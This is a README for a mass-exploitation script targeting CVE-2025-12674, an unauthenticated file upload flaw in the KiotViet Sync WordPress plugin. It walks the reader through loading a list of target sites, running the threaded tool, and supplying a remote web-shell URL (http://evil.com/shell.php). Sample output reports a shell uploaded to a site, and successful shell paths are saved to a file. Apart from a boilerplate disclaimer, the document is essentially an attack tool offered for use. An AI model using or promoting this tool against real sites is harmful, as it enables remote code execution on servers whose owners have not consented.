# CVE-2025-12674
KiotViet Sync &lt;= 1.8.5 - Unauthenticated Arbitrary File Upload

# 🐚 KiotViet Sync <= 1.8.5 - Unauthenticated Arbitrary File Upload

---

## 📝 Description

The **KiotViet Sync** plugin for WordPress (versions up to and including `1.8.5`) is vulnerable to arbitrary file uploads, due to missing file type validation in the `create_media()` function.  
This vulnerability allows **unauthenticated attackers** to upload arbitrary files to the server, which may lead to **remote code execution**.

- **CVE:** [CVE-2025-12674](https://nvd.nist.gov/vuln/detail/CVE-2025-12674)
- **CVSS:** 9.8 (Critical)

---

## 🚀 Usage

1. **Clone this repository, or download the script.**
2. **Prepare your targets:**  
   Place one target per line in a file named `list.txt`.
   ```
   example.com
   site2.com
   http://site3.com
   ```
3. **Run the exploit script:**  
   The script name is:  
   ```
   CVE-2025-12674.py
   ```

   ```bash
   python3 CVE-2025-12674.py
   ```

4. **When prompted, enter your options:**

   ```text
   Enter targets file name (default: list.txt): list.txt
   Enter number of threads (default: 10): 
   Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
   ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
   │ Loaded 1 targets. Threads: 10.                                                                                           │
   ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
   ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
   │ http://nxk.ddev.site                                                                                                     │
   │ Trying KiotViet exploit...                                                                                               │
   ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
   ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
   ║ ✔ Shell uploaded!                                                                                                        ║
   ║ Check here:                                                                                                              ║
   ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
   ║                                                                                                                          ║
   ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
              Summary           
                                
     Metric              Value  
    ─────────────────────────── 
     Total attempts          1  
     Successful shells       1  
     Failed attempts         0  
   ```

- The output directory for the uploaded shell **does not show the file name** (as it is dynamically generated).

---

## 📂 Output

- All successful shell paths are saved to `shells.txt`.
- Backup copies of output are automatically made with timestamps.

---

## ⚠️ Disclaimer

> **This script is provided for educational and authorized security testing purposes only.  
> Unauthorized use against systems that you do not own or have explicit permission to test is illegal and unethical.  
> The author assumes no liability for misuse or for any damage caused.**

---

## 👤 Author

**_Nxploited (Khaled Alenazi)_**
